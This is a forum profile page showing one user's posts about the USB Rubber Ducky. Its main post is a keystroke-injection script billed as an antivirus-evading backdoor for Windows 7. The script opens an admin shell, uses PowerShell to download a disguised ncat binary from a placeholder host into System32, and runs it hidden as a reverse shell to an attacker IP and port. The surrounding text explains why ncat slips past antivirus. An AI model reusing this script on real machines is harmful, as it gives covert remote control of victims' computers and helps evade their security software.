Jump to content

Grimsoul

Members
  • Posts

    3
  • Joined

  • Last visited

Recent Profile Visitors

399 profile views

Grimsoul's Achievements

Newbie

Newbie (1/14)

  1. It's also worth mentioning that the payload (key presses) wont start until the driver is installed. So you dont need a delay while you wait for the driver to install. You seem to misunderstand what the ducky is. It's a keyboard. That's it. It has no way of checking conditions. No logic (if and or). No feedback. You need to be crafty, which is it's charm.
  2. This also works on x64 machines , unlike the base64 payload that uses a vb script.
  3. Just picked up my rubber ducky and thought i'd contribute a bit. (First post btw , Hi!) So we all know that netcat gets picked up by most anti-virus (ratio of about 23/53 ratio) which makes using it as a backdoor slightly challenging. After doing some reading , I figured out that ncat (by nmap) , a moderized version of ncat only had a ratio of 4/53 and was undetected by a lot of major anti-virus programs. So here is a (relatively) undetected backdoor to any windows 7 machine, coded from scratch by yours truly. By no means complicated or innovative at all. For this attack , we download a copy of ncat on the victims machine and run it silently. You can pick up a portable exe of ncat straight from the developers website (1.5 mb) here. ncat , unlike netcat doesn't run in the background like netcat does (requires a cmd to be open to keep the connection alive) so I used so crafty powershell arguments to force it into the background. The rest is explained in the comments. You can compare the AV results between netcat and ncat here: VirusTotal ncat results (Picked up by norton though , sucks i know) VirusTotal netcat results Please feel free to adapt this for your own tailored needs, be it persistence , no-download (twin-duck) or hidden cmd window. - GrimsouL REM --Windows shell undetected by AV (Ncat Download required) WIN7/UAC-- by: GrimSouL 11/7/2014 REM //This delay required on my PC before attempting to get start menu , may not be required on yours/target. DELAY 1000 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU REM //This dely is long because in my machine right clicking certain things takes a long time (many menu options) , adjust as needed. DELAY 1000 STRING a DELAY 200 REM //This enter required for my PC, i've seen alot of scripts where this is omitted but the 'a' above only selects the 'Run as admin' on my machine , hence we need an enter to actually 'click' it ENTER REM //This delay may need to be adjusted depending on machine. Sometimes takes long due to background dimming DELAY 700 LEFTARROW DELAY 400 ENTER DELAY 700 REM //Simple powershell to download ncat portable. You can see it's a .txt extension because most hosters dont allow .exe files. So we change the extension of ncat to a .txt and upload it then rename it back to an exe after download STRING powershell (new-object System.Net.WebClient).DownloadFile('http://yourhost.com/yourPayload.txt','%WINDIR%\System32\yourPayload.exe') ENTER REM //This delay is set to 10 seconds to wait for the downloaded file. Adjust as needed for your/targets connection speed.(ncat = 1.58MB) DELAY 10000 ENTER REM //Where the magic happens , we run the downloaded ncat exe , since ncat doesn't run in the background , we use a powershell argument to make it so. STRING powershell Start-Process -WindowStyle hidden -FilePath %WINDIR%\System32\payloadEn.exe -ArgumentList '<attackerIP> <attackerPORT> -e cmd.exe' ENTER REM // We exit our powershell , however ncat runs silently leaving us with a clean getaway STRING exit ENTER To run our listener on the attacker machine
×
×
  • Create New...